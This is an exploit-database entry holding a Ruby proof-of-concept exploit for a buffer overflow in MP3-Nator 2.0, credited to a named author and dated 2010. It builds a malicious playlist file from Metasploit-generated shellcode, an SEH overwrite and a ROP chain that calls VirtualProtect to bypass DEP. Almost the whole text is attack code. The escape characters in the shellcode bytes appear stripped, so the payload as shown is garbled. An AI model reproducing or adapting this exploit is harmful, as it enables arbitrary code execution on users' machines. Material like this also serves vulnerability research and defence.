[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MP3-Nator Buffer Overflow (SEH - DEP BYPASS)
# Published : 2010-11-18
# Author : Muhamad Fadzil Ramli
# Previous Title : Foxit Reader 4.1.1 Stack Overflow Exploit - Egghunter Mod
# Next Title : DIZzy 1.12 Local Stack Overflow
# Exploit Title: Exploit Buffer Overflow MP3-Nator (SEH - DEP BYPASS)
# Date: 18-11-2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: C4SS!0 G0M3S
# Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http://files.brothersoft.com/mp3_audio/players/mp3nator.zip
# Version: 2.0
# Tested on: Windows XP SP3 EN - Latest Update (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
#! /usr/bin/env ruby
filename = 'crash.plf'
# ./msfpayload windows/exec CMD=calc EXITFUNC=seh R | ./msfencode -e x86/alpha_mixed -b 'x00' -t ruby
# [*] x86/alpha_mixed succeeded with size 456 (iteration=1)
shellcode =
"x89xe3xdaxcfxd9x73xf4x58x50x59x49x49x49x49" +
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" +
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" +
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" +
"x42x75x4ax49x49x6cx4dx38x4dx59x47x70x43x30" +
"x47x70x43x50x4ex69x48x65x50x31x48x52x43x54" +
"x4cx4bx51x42x46x50x4ex6bx50x52x44x4cx4cx4b" +
"x50x52x46x74x4ex6bx51x62x45x78x46x6fx4cx77" +
"x43x7ax47x56x50x31x49x6fx45x61x49x50x4ex4c" +
"x47x4cx45x31x43x4cx47x72x44x6cx51x30x4fx31" +
"x48x4fx46x6dx43x31x49x57x4bx52x4ax50x46x32" +
"x43x67x4cx4bx46x32x46x70x4ex6bx43x72x47x4c" +
"x47x71x48x50x4cx4bx47x30x43x48x4bx35x4bx70" +
"x50x74x43x7ax47x71x4ex30x42x70x4cx4bx51x58" +
"x42x38x4cx4bx42x78x51x30x46x61x48x53x49x73" +
"x47x4cx43x79x4ex6bx44x74x4ex6bx45x51x49x46" +
"x46x51x49x6fx45x61x4bx70x4cx6cx4fx31x48x4f" +
"x46x6dx43x31x4ax67x47x48x4dx30x50x75x48x74" +
"x47x73x43x4dx4ax58x45x6bx43x4dx47x54x42x55" +
"x4bx52x50x58x4cx4bx50x58x45x74x47x71x4ex33" +
"x51x76x4ex6bx44x4cx42x6bx4ex6bx46x38x45x4c" +
"x45x51x4ex33x4ex6bx44x44x4cx4bx46x61x4ax70" +
"x4fx79x50x44x44x64x44x64x51x4bx43x6bx51x71" +
"x43x69x50x5ax42x71x4bx4fx4dx30x46x38x43x6f" +
"x50x5ax4cx4bx47x62x48x6bx4fx76x43x6dx43x5a" +
"x43x31x4cx4dx4ex65x48x39x45x50x47x70x47x70" +
"x46x30x42x48x46x51x4ex6bx42x4fx4ex67x49x6f" +
"x4ex35x4dx6bx4bx4ex46x6ex44x72x4ax4ax50x68" +
"x4cx66x4ax35x4fx4dx4fx6dx4bx4fx48x55x47x4c" +
"x47x76x43x4cx46x6ax4dx50x4bx4bx4dx30x44x35" +
"x45x55x4fx4bx47x37x47x63x43x42x50x6fx51x7a" +
"x45x50x42x73x4bx4fx49x45x45x33x43x51x50x6c" +
"x51x73x45x50x47x7ax41x41"
junk1 = 'A' * 28
# ROP1
rop1 = ''
rop1 << [0x71ABDAC3].pack('V') # PUSH ESP # POP ESI # RETN [Module : WS2_32.dll]
rop1 << [0x71ABDC56].pack('V') # MOV EAX,ESI # POP ESI # RETN [Module : WS2_32.dll]
rop1 << "DEAD" # PADDING
rop1 << [0x1001595E].pack('V') # ADD ESP,20 # RETN - xaudio.dll
# VIRTUALPROTECT PARAMETERS
params = ''
params << [0x7C801AD4].pack('V') # VirtualProtect
params << 'WWWW' # return address [ PARAM #1 ]
params << 'XXXX' # lpAddress [ PARAM #2 ]
params << 'YYYY' # Size [ PARAM #3 ]
params << 'ZZZZ' # flNewProtect [ PARAM #4 ]
params << [0x5ADA1005].pack('V') # writeable address
params << 'BEEF' * 2 # PADDING
# ROP2 - [ PARAM #1 ]
rop2 = ''
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << "BEEF" # PADDING
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]
rop2 << 'BEEF'
# ROP2 - [ PARAM #2 ]
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll]
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]
rop2 << 'BEEF'
# rop2 - [ PARAM #3 ]
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]
rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN [Module : RPCRT4.dll]
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77C4EC2B].pack('V') # ADD EAX,100 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll]
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]
rop2 << 'BEEF'
# rop2 - [ PARAM #4 ]
rop2 << [0x775D1578].pack('V') # PUSH EAX # POP ESI # RETN [Module : ole32.dll]
rop2 << [0x77E8559E].pack('V') # XOR EAX,EAX # RETN [Module : RPCRT4.dll]
rop2 << [0x77C4EC1D].pack('V') # ADD EAX,40 # POP EBP # RETN [Module : msvcrt.dll]
rop2 << 'BEEF' # PADDING
rop2 << [0x77157D1D].pack('V') * 4 # INC ESI # RETN [Module : oleaut32.dll]
rop2 << [0x77E8416B].pack('V') # MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN [Module : RPCRT4.dll]
rop2 << 'BEEF'
# POINT ESP TO VIRTUALPROTECT
rop2 << [0x7475B960].pack('V') # XCHG EAX,ESP # RETN [Module : MSCTF.dll]
nops = "x90" * 310
junk1 = junk1 + rop1 + params + rop2 + nops + shellcode + 'A' * (4112 - (junk1 + rop1 + params + rop2 + nops + shellcode).length)
seh = [0x10019C35].pack('V') # ADD ESP,41C # RETN - xaudio.dll
junk2 = 'C' * (10000 - (junk1 + seh).length)
xploit = junk1 + seh + junk2
File.open(filename,'w') do |fd|
fd.write xploit
puts "file size : #{xploit.length.to_s}"
end